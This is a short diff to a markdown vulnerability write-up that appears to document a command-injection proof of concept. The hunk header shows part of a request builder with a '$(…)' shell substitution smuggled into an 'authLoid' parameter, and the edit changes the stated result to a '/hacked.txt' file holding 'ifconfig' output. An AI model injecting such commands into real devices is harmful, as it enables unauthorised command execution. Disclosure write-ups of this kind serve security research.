--- a/6.md
+++ b/6.md
@@ -153,4 +153,4 @@ Priority: u=0, i""".format(sysauth)),parse_query_string_nowhite("""authLoid=$(if
 
 #### Result
 
-there will be a file named "1011854_test_action_set_system_language" with content "111".
+there will be a file named "/hacked.txt" with result of "ifconfig" .
